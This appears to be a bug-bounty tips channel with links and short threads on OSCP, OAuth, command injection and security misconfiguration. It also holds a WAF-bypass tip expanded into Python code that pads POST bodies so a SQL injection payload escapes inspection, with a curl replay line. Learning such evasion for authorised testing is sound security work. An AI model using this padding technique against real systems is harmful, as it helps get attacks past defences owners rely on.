Requesting APIs using cURL
Thread 🧵👇
https://twitter.com/Rapid_API/status/1619038188403658753?t=BjOLzFEXAD93lYKr8uw4mA&s=19
👍9❤2
Vulnexp 90 | Day12
OS command injection
https://twitter.com/AnukulHexx/status/1619283322575912967?s=20&t=Vkiojbslm9NC6SYllP1ptA
👍5❤1
#bugbountytips Having trouble with a WAF? For POST/PUT/PATCH requests, try inserting a useless parameter containing between 8 KB and 10 MB of random data BEFORE your malicious payload.
Many WAFs stop processing after X payload characters, allowing anything AFTER that through the WAF.
Use this website frequently to generate easy-to-insert payloads (copy and paste):
https://onlinefiletools.com/generate-random-text-file
Credit: ZwinK
❤14👍4
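To make the mechanism in the tip concrete, here is an added Python example (not from the original post or its author). It builds a form-encoded body with a throwaway filler parameter of 8 KB placed ahead of the real payload and runs it through a toy WAF that, by assumption, URL-decodes and signature-matches only the first 8 KB of the body. The parameter names `junk` and `q`, the payload, the signature list and the 8 KB limit are all constructed for the demonstration; the backend-side parse shows that the application still receives the payload intact.

```python
import secrets
import string
import urllib.parse

# Constructed payload for the demonstration: a classic SQL injection string.
PAYLOAD = "' OR 1=1--"

# Assumed limit: the toy WAF below inspects only this many bytes of the body.
WAF_INSPECT_LIMIT = 8 * 1024


def build_padded_body(payload: str, pad_bytes: int = WAF_INSPECT_LIMIT,
                      pad_param: str = "junk", target_param: str = "q") -> str:
    """Form-encoded POST body: a throwaway parameter holding `pad_bytes` of
    random alphanumeric filler, followed by the real parameter.

    The filler alphabet contains no quotes, angle brackets or spaces, so the
    padding itself cannot accidentally match a signature. Parameter names are
    arbitrary placeholders; the target application is assumed to ignore
    `pad_param`.
    """
    alphabet = string.ascii_letters + string.digits
    filler = "".join(secrets.choice(alphabet) for _ in range(pad_bytes))
    return urllib.parse.urlencode([(pad_param, filler), (target_param, payload)])


def naive_waf_blocks(body: str, inspect_limit: int = WAF_INSPECT_LIMIT) -> bool:
    """Toy WAF modelling the weakness the tip relies on: it URL-decodes and
    signature-matches only the first `inspect_limit` bytes of the body.
    The signature list is a constructed, deliberately short one."""
    signatures = ("' or 1=1", "<script", "union select")
    window = urllib.parse.unquote_plus(body[:inspect_limit]).lower()
    return any(sig in window for sig in signatures)


def app_sees_payload(body: str, target_param: str = "q") -> str:
    """The backend parses the whole body, so the payload arrives no matter
    how much filler precedes it."""
    parsed = urllib.parse.parse_qs(body, keep_blank_values=True)
    return parsed.get(target_param, [""])[0]


def curl_command(url: str, body_path: str) -> str:
    """Shell line to replay a saved body with curl; the body is read from a
    file because multi-kilobyte bodies are awkward to pass inline."""
    return (f"curl -sS -X POST '{url}' "
            "-H 'Content-Type: application/x-www-form-urlencoded' "
            f"--data-binary @{body_path}")


if __name__ == "__main__":
    unpadded = build_padded_body(PAYLOAD, pad_bytes=0)
    padded = build_padded_body(PAYLOAD)
    print("unpadded blocked:", naive_waf_blocks(unpadded))   # True
    print("padded blocked:  ", naive_waf_blocks(padded))     # False
    print("backend receives:", app_sees_payload(padded))     # ' OR 1=1--
    with open("padded_body.txt", "w") as fh:
        fh.write(padded)
    # Hypothetical target URL, used only to show the replay command.
    print(curl_command("https://target.example/search", "padded_body.txt"))
```

Two practical caveats: the inspection limit is product-specific, so start at the low end of the range and step up rather than sending 10 MB at once, and some WAFs reject or log bodies above a configured size instead of letting them through, so the backend's own body-size limit and the WAF's oversize behaviour both need to be checked in the responses you get back.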
ChatGPT for Hacking ~ Anugrah
https://anugrahsr.in/chatgpt-for-hacking_talk/
#bugbounty #infosec #bugbountytips #cybersecurity
❤9
Web3 Decoder is a Burp Suite extension that allows you to decode "web3" JSON-RPC calls that interact with smart contracts on an EVM blockchain.
https://github.com/nccgroup/web3-decoder
#bugbounty #web3 #bugbountytips #infosec #cybersecurity
❤9👍1
OSCP Preparation With Active Directory 👨💻
https://bugbountyguide.org/2022/11/29/oscp-preparation-with-active-directory/
❤16👍3
Vulnexp 90 | Day18
OAuth 2.0 Pinpoints
➡️Writeups List:
➡️Top Reports:
Link: https://twitter.com/AnukulHexx/status/1621418176117633027?s=20&t=MRDGJzRhVRI3Y6PkaDI2rQ
🔥3
~ OSCP Resources ⛵👇
All Networking Services & Ports Enumeration
https://bugbountyguide.org/2022/12/24/all-network-services-ports-enumeration/
❤10👍4
⚡ Security Misconfiguration 🌻
One of the top causes of website and application vulnerabilities.
It occurs when systems are not properly configured, leaving them open to attack.
Thread (1/10): 🧵👇
2/10
💻 Security Misconfiguration Occurrence:
• Inadequate security hardening & improper configs in app stack/cloud services
• Enabled unnecessary features/ports/services/accounts/privileges
• Default accounts with unchanged passwords
• Error handling revealing sensitive info
3/10
• Unsecured upgrades & disabled security features
• Insecure values in app servers, frameworks, libraries, & databases
• Insufficient security headers or directives
• Outdated & vulnerable software
• Regular security assessments can help prevent misconfigurations.
4/10
🤒The consequences of misconfiguration can be serious, including data theft, system takeover, and disruption of service.
5/10
🔎 To prevent misconfiguration, it's important to follow best practices and guidelines:
• Establish a repeatable hardening process for fast secure environment deployment
• Configure dev, QA, & prod environments identically with unique credentials
6/10
• Automate the process for minimal effort
• Minimize the platform with no unused features, components, or docs
• Review & update configs for all security notes & patches as part of patch management
• Review cloud storage permissions
7/10
• Implement segmented app architecture with effective separation between components/tenants
• Send security directives (e.g. Security Headers) to clients
• Automate the process to verify configs & settings in all environments.
8/10
💡 Regular security assessments and vulnerability scans can also help identify misconfigurations and other vulnerabilities in your systems.
9/10
🔐 In conclusion, security misconfiguration is a common and serious issue that can be easily prevented with proper planning and attention to detail. Stay secure and protect your systems from attack!
10/10
References 📃👇:
• https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/README
• https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/01-Testing_For_Improper_Error_Handling
• https://github.com/OWASP/ASVS/blob/master/4.0/en/0x22-V14-Config.md
• https://csrc.nist.gov/publications/detail/sp/800-123/final
• https://cisecurity.org/cis-benchmarks/
• https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html
👍8🔥3❤1
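As an added example, not part of the thread above or its references, the following Python audit checks a single HTTP response for several of the misconfigurations the thread lists: missing security headers, component version disclosure, a stack trace returned on error, and an enabled directory listing. The header baseline is an assumption loosely following OWASP ASVS V14 rather than a complete checklist, the stack-trace and listing patterns are constructed, and the two sample responses (the weak configuration beside the corrected one) are made up for the demonstration.

```python
import re

# Assumed baseline of response headers a production deployment should send
# (a subset of what OWASP ASVS V14.4 and the WSTG configuration tests cover).
REQUIRED_HEADERS = {
    "strict-transport-security": "no HSTS, so HTTPS can be downgraded",
    "content-security-policy": "no CSP, so no XSS/clickjacking mitigation",
    "x-content-type-options": "no nosniff, so browsers may sniff MIME types",
}

# Headers that commonly leak component versions (the 'outdated & vulnerable
# software' item): any dotted version number in them is reported.
VERSION_LEAK_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
VERSION_RE = re.compile(r"\d+\.\d+")

# Constructed patterns for common stack-trace formats and for the default
# auto-generated directory index page.
STACK_TRACE_RE = re.compile(
    r"Traceback \(most recent call last\)|Stack trace:|at [\w$.]+\([\w]+\.java:\d+\)",
    re.IGNORECASE,
)
DIR_LISTING_RE = re.compile(r"<title>Index of /", re.IGNORECASE)


def audit_response(status: int, headers: dict, body: str) -> list:
    """Return (finding_id, detail) pairs for one HTTP response.

    Header names are compared case-insensitively. An error body is only
    flagged as verbose when the status is 5xx, so that application pages
    which merely mention the word 'Stack trace' are not reported.
    """
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, why in REQUIRED_HEADERS.items():
        if name not in h:
            findings.append(("missing-header", f"{name}: {why}"))
    for name in VERSION_LEAK_HEADERS:
        value = h.get(name, "")
        if VERSION_RE.search(value):
            findings.append(("version-disclosure", f"{name}: {value}"))
    if status >= 500 and STACK_TRACE_RE.search(body):
        findings.append(("verbose-error", "stack trace returned to the client"))
    if DIR_LISTING_RE.search(body):
        findings.append(("directory-listing", "autoindex enabled on this path"))
    return findings


# Constructed sample responses: the weak configuration beside the corrected one.
MISCONFIGURED_RESPONSE = (
    500,
    {"Server": "Apache/2.4.41 (Ubuntu)", "X-Powered-By": "PHP/7.4.3",
     "Content-Type": "text/html"},
    "<h1>Fatal error</h1>\nStack trace:\n#0 /var/www/html/index.php(12): db_connect()\n",
)
HARDENED_RESPONSE = (
    200,
    {"Server": "Apache",
     "Strict-Transport-Security": "max-age=63072000; includeSubDomains",
     "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
     "X-Content-Type-Options": "nosniff",
     "Content-Type": "text/html"},
    "<html><body>Something went wrong. Reference: 4f2c9a</body></html>",
)

if __name__ == "__main__":
    for label, resp in (("misconfigured", MISCONFIGURED_RESPONSE),
                        ("hardened", HARDENED_RESPONSE)):
        print(label)
        for fid, detail in audit_response(*resp):
            print(f"  [{fid}] {detail}")
```

Run the same function over responses captured from dev, QA and prod to catch the environment drift the thread warns about; a diff of the finding lists between environments is usually more telling than any single list.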